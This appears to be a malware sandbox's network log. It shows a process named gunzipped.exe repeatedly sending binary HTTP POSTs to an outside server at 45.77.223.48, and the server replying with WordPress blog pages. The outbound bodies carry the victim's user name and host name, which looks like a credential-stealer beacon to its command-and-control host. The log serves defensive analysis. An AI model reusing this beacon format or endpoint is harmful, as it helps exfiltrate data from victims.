Apr 26, 2024 04:57:22.132961988 CEST | 82 | IN | Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:57:22.140810966 CEST | 57 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:57:22.141139984 CEST | 32 | IN | Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:57:22.141222000 CEST | 134 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:57:22.141365051 CEST | 152 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:57:22.141568899 CEST | 1289 | IN | Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:57:22.141647100 CEST | 1289 | IN | Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:57:22.141685009 CEST | 670 | IN | Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49747 | 45.77.223.48 | 80 | 7328 | C:\Users\user\Desktop\gunzipped.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 04:57:22.484752893 CEST | 238 | OUT | POST /~blog/?ajax=a HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 45.77.223.48
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 8425B4CA
Content-Length: 149
Connection: close
Apr 26, 2024 04:57:22.673417091 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:57:23.609919071 CEST | 215 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 02:57:22 GMT
Server: Apache
Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
Connection: close
Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:57:23.610285044 CEST | 22 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20
Data Ascii: <!DOCTYPE html><html
Apr 26, 2024 04:57:23.610569000 CEST | 12 | IN | Data Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22
Data Ascii: lang="en-US"
Apr 26, 2024 04:57:23.610644102 CEST | 25 | IN | Data Raw: 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
Data Ascii: ><head><meta charset="
Apr 26, 2024 04:57:23.610702038 CEST | 5 | IN | Data Raw: 55 54 46 2d 38
Data Ascii: UTF-8
Apr 26, 2024 04:57:23.610723019 CEST | 6 | IN | Data Raw: 22 20 2f 3e 0a 09
Data Ascii: " />
Apr 26, 2024 04:57:23.610948086 CEST | 71 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:57:23.620151043 CEST | 57 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:57:23.620531082 CEST | 32 | IN | Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:57:23.620814085 CEST | 134 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49749 | 45.77.223.48 | 80 | 7328 | C:\Users\user\Desktop\gunzipped.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 04:57:23.949613094 CEST | 238 | OUT | POST /~blog/?ajax=a HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 45.77.223.48
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 8425B4CA
Content-Length: 149
Connection: close
Apr 26, 2024 04:57:24.135469913 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:57:25.019373894 CEST | 215 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 02:57:24 GMT
Server: Apache
Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
Connection: close
Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:57:25.019418001 CEST | 70 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09
Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" />
Apr 26, 2024 04:57:25.019454002 CEST | 71 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:57:25.037470102 CEST | 57 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:57:25.038317919 CEST | 32 | IN | Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:57:25.038352966 CEST | 134 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:57:25.038508892 CEST | 1289 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 26, 2024 04:57:25.038574934 CEST | 1289 | IN | Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
Apr 26, 2024 04:57:25.038671970 CEST | 1289 | IN | Data Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
Apr 26, 2024 04:57:25.038753986 CEST | 1289 | IN | Data Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61
Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.44975245.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:25.359560966 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:25.548858881 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:26.395539999 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:25 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:26.395642042 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:26.395678997 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:26.403814077 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:26.404172897 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:26.404267073 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:26.404463053 CEST | 152 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:26.404619932 CEST | 1289 | IN | Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:26.404661894 CEST | 1289 | IN | Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 26, 2024 04:57:26.404908895 CEST | 1289 | IN | Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              11 | 192.168.2.4 | 49754 | 45.77.223.48 | 80 | 7328 | C:\Users\user\Desktop\gunzipped.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Apr 26, 2024 04:57:26.717840910 CEST | 238 | OUT | POST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:26.902945995 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:27.786895990 CEST | 215 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:26 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:27.787142038 CEST | 59 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:27.787182093 CEST | 82 | IN | Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:27.796138048 CEST | 57 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:27.796384096 CEST | 32 | IN | Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:27.796498060 CEST | 134 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:27.796567917 CEST | 152 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:27.796766996 CEST | 1289 | IN | Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:27.796864986 CEST | 1289 | IN | Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 26, 2024 04:57:27.796940088 CEST | 1289 | IN | Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.2.4 | 49756 | 45.77.223.48 | 80 | 7328 | C:\Users\user\Desktop\gunzipped.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Apr 26, 2024 04:57:28.121109962 CEST | 238 | OUT | POST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:28.307106018 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:29.217129946 CEST | 215 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:28 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
